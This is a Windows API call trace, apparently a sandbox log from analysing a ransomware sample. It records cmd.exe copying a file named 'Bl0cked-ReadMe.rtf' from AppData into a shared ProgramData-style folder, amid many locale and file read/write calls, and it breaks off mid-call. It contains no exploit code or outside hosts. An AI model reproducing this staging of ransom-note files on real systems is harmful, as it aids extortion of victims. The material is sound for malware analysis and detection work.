[0150.747] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0150.747] GetUserDefaultLCID () returned 0x409 [0150.748] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0150.748] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12fd58, cchData=128 | out: lpLCData="0") returned 2 [0150.748] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x12fd58, cchData=128 | out: lpLCData="0") returned 2 [0150.748] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12fd58, cchData=128 | out: lpLCData="1") returned 2 [0150.748] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0150.748] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0150.748] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0150.748] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0150.748] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0150.748] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0150.748] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0150.748] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0150.748] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0150.748] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0150.748] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0150.750] GetConsoleTitleW (in: lpConsoleTitle=0x2708d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0150.750] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0150.750] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0150.750] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0150.750] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0150.751] _wcsicmp (_String1="type", _String2=")") returned 75 [0150.751] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0150.751] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0150.751] _wcsicmp (_String1="IF", _String2="type") returned -11 [0150.751] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0150.751] _wcsicmp (_String1="REM", _String2="type") returned -2 [0150.751] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0150.844] _get_osfhandle (_FileHandle=1) returned 0x7 [0150.844] _get_osfhandle (_FileHandle=1) returned 0x7 [0150.844] _get_osfhandle (_FileHandle=1) returned 0x7 [0150.844] GetFileType (hFile=0x7) returned 0x2 [0150.844] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0150.844] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12fc50 | out: lpMode=0x12fc50) returned 1 [0150.844] _dup (_FileHandle=1) returned 3 [0150.845] _close (_FileHandle=1) returned 0 [0150.845] _wcsicmp (_String1="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0150.845] CreateFileW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\alluse~1\\micros~1\\mf\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x12fc20, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0150.846] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0150.846] GetConsoleTitleW (in: lpConsoleTitle=0x12fa50, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0150.847] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0150.847] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0150.847] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0150.847] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0150.847] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0150.848] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x12f5b4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f5b4) returned 0x270e60 [0150.848] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0150.848] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0150.848] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0150.848] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x12e4c0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0150.848] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0150.848] _get_osfhandle (_FileHandle=4) returned 0x54 [0150.848] GetFileType (hFile=0x54) returned 0x1 [0150.848] _get_osfhandle (_FileHandle=4) returned 0x54 [0150.849] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x12e518 | out: lpFileSizeHigh=0x12e518*=0x0) returned 0x1632 [0150.849] _get_osfhandle (_FileHandle=4) returned 0x54 [0150.849] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.849] _get_osfhandle (_FileHandle=4) returned 0x54 [0150.849] ReadFile (in: hFile=0x54, lpBuffer=0x12f350, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e540, lpOverlapped=0x0 | out: lpBuffer=0x12f350*, lpNumberOfBytesRead=0x12e540*=0x200, lpOverlapped=0x0) returned 1 [0150.849] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.849] GetFileType (hFile=0x4c) returned 0x1 [0150.849] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.849] GetFileType (hFile=0x4c) returned 0x1 [0150.849] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.849] WriteFile (in: hFile=0x4c, lpBuffer=0x12f350*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f350*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.850] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.850] GetFileType (hFile=0x4c) returned 0x1 [0150.850] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.850] WriteFile (in: hFile=0x4c, lpBuffer=0x12f3a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f3a0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.850] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.850] GetFileType (hFile=0x4c) returned 0x1 [0150.850] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.851] WriteFile (in: hFile=0x4c, lpBuffer=0x12f3f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f3f0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.851] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.851] GetFileType (hFile=0x4c) returned 0x1 [0150.851] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.851] WriteFile (in: hFile=0x4c, lpBuffer=0x12f440*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f440*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.851] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.851] GetFileType (hFile=0x4c) returned 0x1 [0150.851] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.851] WriteFile (in: hFile=0x4c, lpBuffer=0x12f490*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f490*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.851] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.851] GetFileType (hFile=0x4c) returned 0x1 [0150.851] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.851] WriteFile (in: hFile=0x4c, lpBuffer=0x12f4e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f4e0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.851] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.851] GetFileType (hFile=0x4c) returned 0x1 [0150.851] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.851] WriteFile (in: hFile=0x4c, lpBuffer=0x12f530*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f530*, lpNumberOfBytesWritten=0x12e534*=0x20, lpOverlapped=0x0) returned 1 [0150.851] _get_osfhandle (_FileHandle=4) returned 0x54 [0150.851] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e520 | out: lpNewFilePointer=0x0) returned 1 [0150.851] _get_osfhandle (_FileHandle=4) returned 0x54 [0150.851] ReadFile (in: hFile=0x54, lpBuffer=0x12f350, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e540, lpOverlapped=0x0 | out: lpBuffer=0x12f350*, lpNumberOfBytesRead=0x12e540*=0x200, lpOverlapped=0x0) returned 1 [0150.851] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.851] GetFileType (hFile=0x4c) returned 0x1 [0150.851] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.852] GetFileType (hFile=0x4c) returned 0x1 [0150.852] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.852] WriteFile (in: hFile=0x4c, lpBuffer=0x12f350*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f350*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.852] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.852] GetFileType (hFile=0x4c) returned 0x1 [0150.852] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.852] WriteFile (in: hFile=0x4c, lpBuffer=0x12f3a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f3a0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.852] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.852] GetFileType (hFile=0x4c) returned 0x1 [0150.852] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.852] WriteFile (in: hFile=0x4c, lpBuffer=0x12f3f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f3f0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.852] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.852] GetFileType (hFile=0x4c) returned 0x1 [0150.852] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.852] WriteFile (in: hFile=0x4c, lpBuffer=0x12f440*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f440*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.852] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.852] GetFileType (hFile=0x4c) returned 0x1 [0150.852] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.852] WriteFile (in: hFile=0x4c, lpBuffer=0x12f490*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f490*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.852] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.852] GetFileType (hFile=0x4c) returned 0x1 [0150.852] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.852] WriteFile (in: hFile=0x4c, lpBuffer=0x12f4e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f4e0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.852] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.852] GetFileType (hFile=0x4c) returned 0x1 [0150.853] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.853] WriteFile (in: hFile=0x4c, lpBuffer=0x12f530*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f530*, lpNumberOfBytesWritten=0x12e534*=0x20, lpOverlapped=0x0) returned 1 [0150.853] _get_osfhandle (_FileHandle=4) returned 0x54 [0150.853] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e520 | out: lpNewFilePointer=0x0) returned 1 [0150.853] _get_osfhandle (_FileHandle=4) returned 0x54 [0150.853] ReadFile (in: hFile=0x54, lpBuffer=0x12f350, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e540, lpOverlapped=0x0 | out: lpBuffer=0x12f350*, lpNumberOfBytesRead=0x12e540*=0x200, lpOverlapped=0x0) returned 1 [0150.853] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.853] GetFileType (hFile=0x4c) returned 0x1 [0150.853] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.853] GetFileType (hFile=0x4c) returned 0x1 [0150.853] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.853] WriteFile (in: hFile=0x4c, lpBuffer=0x12f350*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f350*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.853] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.853] GetFileType (hFile=0x4c) returned 0x1 [0150.853] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.853] WriteFile (in: hFile=0x4c, lpBuffer=0x12f3a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f3a0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.853] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.853] GetFileType (hFile=0x4c) returned 0x1 [0150.853] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.853] WriteFile (in: hFile=0x4c, lpBuffer=0x12f3f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f3f0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.853] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.853] GetFileType (hFile=0x4c) returned 0x1 [0150.853] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.853] WriteFile (in: hFile=0x4c, lpBuffer=0x12f440*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f440*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.853] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.854] GetFileType (hFile=0x4c) returned 0x1 [0150.854] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.854] WriteFile (in: hFile=0x4c, lpBuffer=0x12f490*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f490*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.854] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.854] GetFileType (hFile=0x4c) returned 0x1 [0150.854] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.854] WriteFile (in: hFile=0x4c, lpBuffer=0x12f4e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f4e0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.854] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.854] GetFileType (hFile=0x4c) returned 0x1 [0150.854] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.854] WriteFile (in: hFile=0x4c, lpBuffer=0x12f530*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f530*, lpNumberOfBytesWritten=0x12e534*=0x20, lpOverlapped=0x0) returned 1 [0150.854] _get_osfhandle (_FileHandle=4) returned 0x54 [0150.854] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e520 | out: lpNewFilePointer=0x0) returned 1 [0150.854] _get_osfhandle (_FileHandle=4) returned 0x54 [0150.854] ReadFile (in: hFile=0x54, lpBuffer=0x12f350, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e540, lpOverlapped=0x0 | out: lpBuffer=0x12f350*, lpNumberOfBytesRead=0x12e540*=0x200, lpOverlapped=0x0) returned 1 [0150.854] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.854] GetFileType (hFile=0x4c) returned 0x1 [0150.854] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.854] GetFileType (hFile=0x4c) returned 0x1 [0150.854] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.854] WriteFile (in: hFile=0x4c, lpBuffer=0x12f350*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f350*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.854] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.854] GetFileType (hFile=0x4c) returned 0x1 [0150.854] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.854] WriteFile (in: hFile=0x4c, lpBuffer=0x12f3a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f3a0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.855] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.855] GetFileType (hFile=0x4c) returned 0x1 [0150.855] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.855] WriteFile (in: hFile=0x4c, lpBuffer=0x12f3f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f3f0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.855] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.855] GetFileType (hFile=0x4c) returned 0x1 [0150.855] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.855] WriteFile (in: hFile=0x4c, lpBuffer=0x12f440*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f440*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.855] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.855] GetFileType (hFile=0x4c) returned 0x1 [0150.855] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.855] WriteFile (in: hFile=0x4c, lpBuffer=0x12f490*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f490*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.855] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.855] GetFileType (hFile=0x4c) returned 0x1 [0150.855] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.855] WriteFile (in: hFile=0x4c, lpBuffer=0x12f4e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f4e0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.855] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.855] GetFileType (hFile=0x4c) returned 0x1 [0150.855] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.855] WriteFile (in: hFile=0x4c, lpBuffer=0x12f530*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f530*, lpNumberOfBytesWritten=0x12e534*=0x20, lpOverlapped=0x0) returned 1 [0150.855] _get_osfhandle (_FileHandle=4) returned 0x54 [0150.855] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e520 | out: lpNewFilePointer=0x0) returned 1 [0150.855] _get_osfhandle (_FileHandle=4) returned 0x54 [0150.855] ReadFile (in: hFile=0x54, lpBuffer=0x12f350, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e540, lpOverlapped=0x0 | out: lpBuffer=0x12f350*, lpNumberOfBytesRead=0x12e540*=0x200, lpOverlapped=0x0) returned 1 [0150.855] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.855] GetFileType (hFile=0x4c) returned 0x1 [0150.856] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.856] GetFileType (hFile=0x4c) returned 0x1 [0150.856] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.856] WriteFile (in: hFile=0x4c, lpBuffer=0x12f350*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f350*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.856] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.856] GetFileType (hFile=0x4c) returned 0x1 [0150.856] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.856] WriteFile (in: hFile=0x4c, lpBuffer=0x12f3a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f3a0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.856] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.856] GetFileType (hFile=0x4c) returned 0x1 [0150.856] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.856] WriteFile (in: hFile=0x4c, lpBuffer=0x12f3f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f3f0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.856] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.856] GetFileType (hFile=0x4c) returned 0x1 [0150.856] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.856] WriteFile (in: hFile=0x4c, lpBuffer=0x12f440*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f440*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.856] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.856] GetFileType (hFile=0x4c) returned 0x1 [0150.856] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.856] WriteFile (in: hFile=0x4c, lpBuffer=0x12f490*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f490*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.856] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.856] GetFileType (hFile=0x4c) returned 0x1 [0150.856] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.856] WriteFile (in: hFile=0x4c, lpBuffer=0x12f4e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f4e0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.856] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.856] GetFileType (hFile=0x4c) returned 0x1 [0150.857] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.857] WriteFile (in: hFile=0x4c, lpBuffer=0x12f530*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f530*, lpNumberOfBytesWritten=0x12e534*=0x20, lpOverlapped=0x0) returned 1 [0150.857] _get_osfhandle (_FileHandle=4) returned 0x54 [0150.857] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e520 | out: lpNewFilePointer=0x0) returned 1 [0150.857] _get_osfhandle (_FileHandle=4) returned 0x54 [0150.857] ReadFile (in: hFile=0x54, lpBuffer=0x12f350, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e540, lpOverlapped=0x0 | out: lpBuffer=0x12f350*, lpNumberOfBytesRead=0x12e540*=0x200, lpOverlapped=0x0) returned 1 [0150.857] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.857] GetFileType (hFile=0x4c) returned 0x1 [0150.857] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.857] GetFileType (hFile=0x4c) returned 0x1 [0150.857] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.857] WriteFile (in: hFile=0x4c, lpBuffer=0x12f350*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f350*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.857] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.857] GetFileType (hFile=0x4c) returned 0x1 [0150.857] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.857] WriteFile (in: hFile=0x4c, lpBuffer=0x12f3a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f3a0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.857] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.857] GetFileType (hFile=0x4c) returned 0x1 [0150.857] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.857] WriteFile (in: hFile=0x4c, lpBuffer=0x12f3f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f3f0*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.857] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.857] GetFileType (hFile=0x4c) returned 0x1 [0150.857] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.857] WriteFile (in: hFile=0x4c, lpBuffer=0x12f440*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f440*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.857] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.858] GetFileType (hFile=0x4c) returned 0x1 [0150.858] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.858] WriteFile (in: hFile=0x4c, lpBuffer=0x12f490*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e534, lpOverlapped=0x0 | out: lpBuffer=0x12f490*, lpNumberOfBytesWritten=0x12e534*=0x50, lpOverlapped=0x0) returned 1 [0150.858] _get_osfhandle (_FileHandle=1) returned 0x4c [0150.858] GetFileType (hFile=0x4c) 